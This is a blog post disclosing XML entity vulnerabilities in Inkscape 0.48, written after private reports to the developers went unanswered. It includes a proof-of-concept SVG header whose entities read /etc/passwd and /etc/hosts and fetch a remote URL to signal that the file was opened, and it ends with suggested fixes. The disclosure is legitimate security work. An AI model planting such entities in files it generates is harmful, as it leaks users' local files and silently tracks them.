JonBlog
Thoughts on website ideas, PHP and other tech topics, plus going car-free
Inkscape XML entity vulnerabilities
Categories: Technical, XML

Way back in March, I found that Inkscape contains some security vulnerabilities related to its processing of XML entities at the start of an SVG document. I’ve persisted privately since discovery to get a fix from Inkscape core developers, alongside the Ubuntu Security Team, to no avail. Following the generally accepted tenets of responsible reporting, I am now making this information public, so¬† users know to take the necessary precautions. I hope the Inkscape team can get an advisory notice and fix arranged soon.

Firstly, an SVG file can be constructed that will silently notify a third party when it is opened in Inkscape, by reading and including the contents of an arbitrary remote URI. Secondly, the contents of any local text file can be included as well, which is a serious issue if a user were to save and redistribute an SVG file that (unknown to them) contains this attack. This risks releasing files in well-known locations to the sender, or to the internet at large if the SVG file is published.

Here is a demonstration of both remote notification and local file stealing – just insert the <!DOCTYPE> directive into an SVG file, then add a text element containing an entity reference (e.g. &hackb;) using a text editor.

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!-- Created with Inkscape (http://www.inkscape.org/) -->

<!DOCTYPE svg
  [
    <!ENTITY hacka SYSTEM "file:///etc/passwd">
    <!ENTITY hackb SYSTEM "file:///etc/hosts">
    <!ENTITY hackc SYSTEM "http://aimee.jondh.me.uk/tmp/test.txt">
  ]
<svg
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:cc="http://creativecommons.org/ns#"
(rest of doc snipped)

When a file of this kind is saved in Inkscape, the references are replaced with the local/remote file contents, but the entities are removed. Thus, a hidden text field could be used to take a copy of any local file that is safe to quote in XML, and for which the path is known. It is possible that, with a little extra research, even binary files could be stolen in a similar way.

I’ve advised the Inkscape team that the option “–allow-entities” would be good idea for command line processing, so that entities are disabled by default, but may be turned on for users who need it. In turn they’ve suggested that, in GUI mode, Inkscape could warn users with a dialogue box if (malicious) entities are discovered in a document.

The issues are confirmed on Inkscape 0.48 r9819 running on OS X 10.6.8.

Leave a Reply